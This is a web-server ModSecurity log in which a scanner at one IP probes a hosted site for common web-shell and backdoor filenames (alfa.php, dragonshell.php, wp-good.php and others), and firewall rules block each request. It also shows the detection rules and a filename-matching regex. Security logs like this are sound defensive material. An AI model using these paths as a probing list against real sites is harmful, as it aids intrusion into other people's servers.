[Tue May 26 12:54:46.593122 2026] [security2:error] [pid 461618:tid 461823] [client 20.9.81.163:31448] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/ws77.php"] [unique_id "ahVKvlyiSlSCHr1fdr22qAAAANA"]
[Tue May 26 12:54:46.719877 2026] [security2:error] [pid 461618:tid 461748] [client 20.9.81.163:17382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/2.php"] [unique_id "ahVKvlyiSlSCHr1fdr22rAAAAIU"]
[Tue May 26 12:54:46.719979 2026] [security2:error] [pid 461618:tid 461748] [client 20.9.81.163:17382] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/2.php"] [unique_id "ahVKvlyiSlSCHr1fdr22rAAAAIU"]
[Tue May 26 12:54:46.854374 2026] [security2:error] [pid 461618:tid 461851] [client 20.9.81.163:17375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/abcd.php"] [unique_id "ahVKvlyiSlSCHr1fdr22rgAAAOw"]
[Tue May 26 12:54:46.854485 2026] [security2:error] [pid 461618:tid 461851] [client 20.9.81.163:17375] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/abcd.php"] [unique_id "ahVKvlyiSlSCHr1fdr22rgAAAOw"]
[Tue May 26 12:54:46.971618 2026] [security2:error] [pid 461618:tid 461775] [client 20.9.81.163:1275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVKvlyiSlSCHr1fdr22sgAAAKA"]
[Tue May 26 12:54:46.971753 2026] [security2:error] [pid 461618:tid 461775] [client 20.9.81.163:1275] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVKvlyiSlSCHr1fdr22sgAAAKA"]
[Tue May 26 12:54:47.098961 2026] [security2:error] [pid 461618:tid 461770] [client 20.9.81.163:31484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/asd.php"] [unique_id "ahVKv1yiSlSCHr1fdr22swAAAJs"]
[Tue May 26 12:54:47.099104 2026] [security2:error] [pid 461618:tid 461770] [client 20.9.81.163:31484] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/asd.php"] [unique_id "ahVKv1yiSlSCHr1fdr22swAAAJs"]
[Tue May 26 12:54:47.227032 2026] [security2:error] [pid 461618:tid 461785] [client 20.9.81.163:37972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/default.php"] [unique_id "ahVKv1yiSlSCHr1fdr22uAAAAKo"]
[Tue May 26 12:54:47.227233 2026] [security2:error] [pid 461618:tid 461785] [client 20.9.81.163:37972] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/default.php"] [unique_id "ahVKv1yiSlSCHr1fdr22uAAAAKo"]
[Tue May 26 12:54:47.362561 2026] [security2:error] [pid 461618:tid 461822] [client 20.9.81.163:17385] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/gettest.php"] [unique_id "ahVKv1yiSlSCHr1fdr22vgAAAM8"]
[Tue May 26 12:54:47.362709 2026] [security2:error] [pid 461618:tid 461822] [client 20.9.81.163:17385] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/gettest.php"] [unique_id "ahVKv1yiSlSCHr1fdr22vgAAAM8"]
[Tue May 26 12:54:47.509530 2026] [security2:error] [pid 461618:tid 461749] [client 20.9.81.163:1198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/install.php"] [unique_id "ahVKv1yiSlSCHr1fdr22wgAAAIY"]
[Tue May 26 12:54:47.509663 2026] [security2:error] [pid 461618:tid 461749] [client 20.9.81.163:1198] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/install.php"] [unique_id "ahVKv1yiSlSCHr1fdr22wgAAAIY"]
[Tue May 26 12:54:47.641519 2026] [security2:error] [pid 461618:tid 461826] [client 20.9.81.163:9651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/tfm.php"] [unique_id "ahVKv1yiSlSCHr1fdr22yQAAANM"]
[Tue May 26 12:54:47.641655 2026] [security2:error] [pid 461618:tid 461826] [client 20.9.81.163:9651] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/tfm.php"] [unique_id "ahVKv1yiSlSCHr1fdr22yQAAANM"]
[Tue May 26 12:54:47.783129 2026] [security2:error] [pid 461618:tid 461862] [client 20.9.81.163:1257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/ws81.php"] [unique_id "ahVKv1yiSlSCHr1fdr22zgAAAPc"]
[Tue May 26 12:54:47.783253 2026] [security2:error] [pid 461618:tid 461862] [client 20.9.81.163:1257] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/ws81.php"] [unique_id "ahVKv1yiSlSCHr1fdr22zgAAAPc"]
[Tue May 26 12:54:47.793242 2026] [security2:error] [pid 461618:tid 461816] [client 74.249.173.207:4360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahVKv1yiSlSCHr1fdr220QAAAMk"]
[Tue May 26 12:54:47.907015 2026] [security2:error] [pid 461618:tid 461797] [client 20.9.81.163:29867] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/222.php"] [unique_id "ahVKv1yiSlSCHr1fdr221gAAALY"]
[Tue May 26 12:54:47.907144 2026] [security2:error] [pid 461618:tid 461797] [client 20.9.81.163:29867] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/222.php"] [unique_id "ahVKv1yiSlSCHr1fdr221gAAALY"]
[Tue May 26 12:54:47.991475 2026] [security2:error] [pid 461618:tid 461782] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKv1yiSlSCHr1fdr22xQAAAKc"]
[Tue May 26 12:54:48.034038 2026] [security2:error] [pid 461618:tid 461864] [client 20.9.81.163:31476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/t.php"] [unique_id "ahVKwFyiSlSCHr1fdr221wAAAPk"]
[Tue May 26 12:54:48.034144 2026] [security2:error] [pid 461618:tid 461864] [client 20.9.81.163:31476] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/t.php"] [unique_id "ahVKwFyiSlSCHr1fdr221wAAAPk"]
[Tue May 26 12:54:48.172347 2026] [security2:error] [pid 461618:tid 461829] [client 20.9.81.163:10260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-admin/maint/index.php"] [unique_id "ahVKwFyiSlSCHr1fdr223gAAANY"]
[Tue May 26 12:54:48.172447 2026] [security2:error] [pid 461618:tid 461829] [client 20.9.81.163:10260] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-admin/maint/index.php"] [unique_id "ahVKwFyiSlSCHr1fdr223gAAANY"]
[Tue May 26 12:54:48.226920 2026] [security2:error] [pid 461618:tid 461840] [client 113.179.120.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKv1yiSlSCHr1fdr220gAAAOE"]
[Tue May 26 12:54:48.248013 2026] [security2:error] [pid 461618:tid 461722] [remote 65.1.132.161:11480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 161.132.1.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVKwFyiSlSCHr1fdr222wAAuGc"]
[Tue May 26 12:54:48.299863 2026] [security2:error] [pid 461618:tid 461749] [client 20.9.81.163:40966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/6xBAm3vODE05BSzkJZRAws.php"] [unique_id "ahVKwFyiSlSCHr1fdr225AAAAIY"]
[Tue May 26 12:54:48.299949 2026] [security2:error] [pid 461618:tid 461749] [client 20.9.81.163:40966] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/6xBAm3vODE05BSzkJZRAws.php"] [unique_id "ahVKwFyiSlSCHr1fdr225AAAAIY"]
[Tue May 26 12:54:48.422940 2026] [security2:error] [pid 461618:tid 461801] [client 20.9.81.163:34034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/a.php"] [unique_id "ahVKwFyiSlSCHr1fdr228AAAALo"]
[Tue May 26 12:54:48.423040 2026] [security2:error] [pid 461618:tid 461801] [client 20.9.81.163:34034] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/a.php"] [unique_id "ahVKwFyiSlSCHr1fdr228AAAALo"]
[Tue May 26 12:54:48.587406 2026] [security2:error] [pid 461618:tid 461761] [client 20.9.81.163:34006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/a1.php"] [unique_id "ahVKwFyiSlSCHr1fdr23AAAAAJI"]
[Tue May 26 12:54:48.587520 2026] [security2:error] [pid 461618:tid 461761] [client 20.9.81.163:34006] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/a1.php"] [unique_id "ahVKwFyiSlSCHr1fdr23AAAAAJI"]
[Tue May 26 12:54:48.710937 2026] [security2:error] [pid 461618:tid 461764] [client 20.9.81.163:10279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/onclickfuns.php"] [unique_id "ahVKwFyiSlSCHr1fdr23AwAAAJU"]
[Tue May 26 12:54:48.711045 2026] [security2:error] [pid 461618:tid 461764] [client 20.9.81.163:10279] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/onclickfuns.php"] [unique_id "ahVKwFyiSlSCHr1fdr23AwAAAJU"]
[Tue May 26 12:54:48.868826 2026] [security2:error] [pid 461618:tid 461750] [client 20.9.81.163:32737] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/w.php"] [unique_id "ahVKwFyiSlSCHr1fdr23DgAAAIc"]
[Tue May 26 12:54:48.868953 2026] [security2:error] [pid 461618:tid 461750] [client 20.9.81.163:32737] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/w.php"] [unique_id "ahVKwFyiSlSCHr1fdr23DgAAAIc"]
[Tue May 26 12:54:48.995395 2026] [security2:error] [pid 461618:tid 461864] [client 20.9.81.163:32767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-admin/maint/about.php"] [unique_id "ahVKwFyiSlSCHr1fdr23DwAAAPk"]
[Tue May 26 12:54:48.995510 2026] [security2:error] [pid 461618:tid 461864] [client 20.9.81.163:32767] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-admin/maint/about.php"] [unique_id "ahVKwFyiSlSCHr1fdr23DwAAAPk"]
[Tue May 26 12:54:49.129589 2026] [security2:error] [pid 461618:tid 461819] [client 20.9.81.163:34040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/index.php"] [unique_id "ahVKwVyiSlSCHr1fdr23EwAAAMw"]
[Tue May 26 12:54:49.129714 2026] [security2:error] [pid 461618:tid 461819] [client 20.9.81.163:34040] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/index.php"] [unique_id "ahVKwVyiSlSCHr1fdr23EwAAAMw"]
[Tue May 26 12:54:49.257064 2026] [security2:error] [pid 461618:tid 461809] [client 20.9.81.163:28290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-good.php"] [unique_id "ahVKwVyiSlSCHr1fdr23FwAAAMI"]
[Tue May 26 12:54:49.257170 2026] [security2:error] [pid 461618:tid 461809] [client 20.9.81.163:28290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-good.php"] [unique_id "ahVKwVyiSlSCHr1fdr23FwAAAMI"]
[Tue May 26 12:54:49.395379 2026] [security2:error] [pid 461618:tid 461827] [client 20.9.81.163:10262] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/\\\\.[a-z0-9]{4}\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "784"] [id "900080"] [msg "PHP Mailer Access Attempt"] [hostname "azurmediatec.com"] [uri "/.info.php"] [unique_id "ahVKwVyiSlSCHr1fdr23JAAAANQ"]
[Tue May 26 12:54:49.395488 2026] [security2:error] [pid 461618:tid 461827] [client 20.9.81.163:10262] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "azurmediatec.com"] [uri "/.info.php"] [unique_id "ahVKwVyiSlSCHr1fdr23JAAAANQ"]
[Tue May 26 12:54:49.531510 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:10268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/config.php"] [unique_id "ahVKwVyiSlSCHr1fdr23KAAAAJk"]
[Tue May 26 12:54:49.531719 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:10268] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/config.php"] [unique_id "ahVKwVyiSlSCHr1fdr23KAAAAJk"]
[Tue May 26 12:54:49.653330 2026] [security2:error] [pid 461618:tid 461844] [client 20.9.81.163:37969] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/item.php"] [unique_id "ahVKwVyiSlSCHr1fdr23LQAAAOU"]
[Tue May 26 12:54:49.653436 2026] [security2:error] [pid 461618:tid 461844] [client 20.9.81.163:37969] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/item.php"] [unique_id "ahVKwVyiSlSCHr1fdr23LQAAAOU"]
[Tue May 26 12:54:49.787670 2026] [security2:error] [pid 461618:tid 461828] [client 20.9.81.163:32766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/albin.php"] [unique_id "ahVKwVyiSlSCHr1fdr23LgAAANU"]
[Tue May 26 12:54:49.787810 2026] [security2:error] [pid 461618:tid 461828] [client 20.9.81.163:32766] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/albin.php"] [unique_id "ahVKwVyiSlSCHr1fdr23LgAAANU"]
[Tue May 26 12:54:49.910044 2026] [security2:error] [pid 461618:tid 461780] [client 20.9.81.163:1697] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/alfa.php"] [unique_id "ahVKwVyiSlSCHr1fdr23OAAAAKU"]
[Tue May 26 12:54:49.910166 2026] [security2:error] [pid 461618:tid 461780] [client 20.9.81.163:1697] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/alfa.php"] [unique_id "ahVKwVyiSlSCHr1fdr23OAAAAKU"]
[Tue May 26 12:54:50.037803 2026] [security2:error] [pid 461618:tid 461806] [client 20.9.81.163:1237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/autoload_classmap.php"] [unique_id "ahVKwlyiSlSCHr1fdr23OwAAAL8"]
[Tue May 26 12:54:50.037889 2026] [security2:error] [pid 461618:tid 461806] [client 20.9.81.163:1237] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/autoload_classmap.php"] [unique_id "ahVKwlyiSlSCHr1fdr23OwAAAL8"]
[Tue May 26 12:54:50.172113 2026] [security2:error] [pid 461618:tid 461873] [client 20.9.81.163:44734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/av.php"] [unique_id "ahVKwlyiSlSCHr1fdr23QgAAAQI"]
[Tue May 26 12:54:50.172205 2026] [security2:error] [pid 461618:tid 461873] [client 20.9.81.163:44734] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/av.php"] [unique_id "ahVKwlyiSlSCHr1fdr23QgAAAQI"]
[Tue May 26 12:54:50.235612 2026] [security2:error] [pid 461618:tid 461851] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKwVyiSlSCHr1fdr23MQAAAOw"]
[Tue May 26 12:54:50.301286 2026] [security2:error] [pid 461618:tid 461766] [client 20.9.81.163:44714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/dragonshell.php"] [unique_id "ahVKwlyiSlSCHr1fdr23SQAAAJc"]
[Tue May 26 12:54:50.301524 2026] [security2:error] [pid 461618:tid 461766] [client 20.9.81.163:44714] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/dragonshell.php"] [unique_id "ahVKwlyiSlSCHr1fdr23SQAAAJc"]
[Tue May 26 12:54:50.439434 2026] [security2:error] [pid 461618:tid 461832] [client 20.9.81.163:9652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/f35.php"] [unique_id "ahVKwlyiSlSCHr1fdr23TgAAANk"]
[Tue May 26 12:54:50.439565 2026] [security2:error] [pid 461618:tid 461832] [client 20.9.81.163:9652] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/f35.php"] [unique_id "ahVKwlyiSlSCHr1fdr23TgAAANk"]
